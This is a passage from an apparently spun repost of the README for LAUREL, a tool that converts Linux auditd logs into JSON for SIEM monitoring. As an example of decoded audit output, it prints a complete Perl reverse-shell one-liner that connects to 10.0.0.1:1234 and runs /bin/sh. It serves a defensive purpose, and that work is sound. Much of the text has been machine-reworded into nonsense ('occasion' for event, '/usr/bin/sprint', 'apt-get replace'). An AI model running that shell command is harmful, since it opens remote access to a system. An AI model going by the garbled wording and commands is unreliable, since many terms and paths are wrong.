Tuesday, July 26, 2022
HomeHackerRemodel Linux Audit Logs For SIEM Utilization

Remodel Linux Audit Logs For SIEM Utilization




LAUREL is an occasion post-processing plugin for auditd(8) to enhance its usability in fashionable safety monitoring setups.

Why?

TLDR: As a substitute of audit occasions that appear to be this…

kind=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…flip them into JSON logs the place the mess that your pen testers/purple teamers/attackers are attempting to make turns into obvious at first look:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}

This occurs on the supply. The generated occasion even comprises helpful details about the spawning course of:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/sprint","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) comprise info that may be very helpful in a SIEM context (if a helpful rule set has been configured). Nevertheless, the format is just not well-suited for at-scale evaluation: Occasions are often cut up throughout totally different traces that should be merged utilizing a message identifier. Recordsdata and program executions are logged by way of PATH and EXECVE parts, however a restricted character set for strings causes lots of these entries to be hex-encoded. For a extra detailed dialogue, see Sensible auditd(8) issues.

LAUREL solves these issues by consuming audit occasions, parsing and reworking them into extra information and writing them out as a JSON-based log format, whereas preserving all info intact that was a part of the unique audit log. It doesn’t change auditd(8) as the patron of audit messages from the kernel. As a substitute, it makes use of the audisp (“audit dispatch”) interface to obtain messages by way of auditd(8). Subsequently, it could actually peacefully coexist with different shoppers of audit occasions (e.g. some EDR merchandise).

Check with JSON-based log format for an outline of the log format.

We developed this instrument as a result of we weren’t content material with function units and efficiency traits of current tasks and merchandise. Please confer with Efficiency for particulars.

A phrase about audit guidelines

A very good start line for an audit ruleset is https://github.com/Neo23x0/auditd, however usually talking, any ruleset will do. LAUREL will at the moment solely work as designed if Finish Of Occasion report should not suppressed, so guidelines like

-a at all times,exclude -F msgtype=EOE

needs to be eliminated.

Occasions with context

Each occasion that’s brought on by a syscall or filesystem rule is annotated with details about the father or mother of the method that brought on the occasion. If obtainable, id factors to the message comparable to the final execve syscall for this course of:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/sprint",
"ppid": 1532
}

Including extra context: Keys and course of labels

Audit occasions can comprise a key, a brief string that can be utilized to filter occasions. LAUREL may be configured to acknowledge such keys and add them as keys to the method that brought on the occasion. These labels can be propagated to little one processes. That is helpful to keep away from costly JOIN-like operations in log evaluation to filter out innocent occasions.

Contemplate the next rule that set keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let’s configure LAUREL to show the software_mgmt key right into a course of label that’s propagated to little one processes:

Along with a ruleset that logs execve(2) and variants, this may trigger each occasion immediately brought on by apt-get and its subprocesses to be labelled software_mgmt.

For instance, operating sudo apt-get replace on a Debian/bullseye system with a couple of sources configured, the next subprocesses labelled software_gmt may be noticed in LAUREL’s audit log:

  • apt-get replace
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/strategies/http
  • /usr/lib/apt/strategies/https
  • /usr/lib/apt/strategies/https
  • /usr/lib/apt/strategies/http
  • /usr/lib/apt/strategies/gpgv
  • /usr/lib/apt/strategies/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This kind of monitoring additionally works for bundle set up or removing. If some bundle’s post-installation script is behaving suspiciously, a SIEM analyst will be capable to make the connection to the software program set up course of by inspecting the only occasion.

Set up

See INSTALL.md.

License

GNU Basic Public License, model 3

Authors

The brand was created by Birgit Meyer <[email protected]>.



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments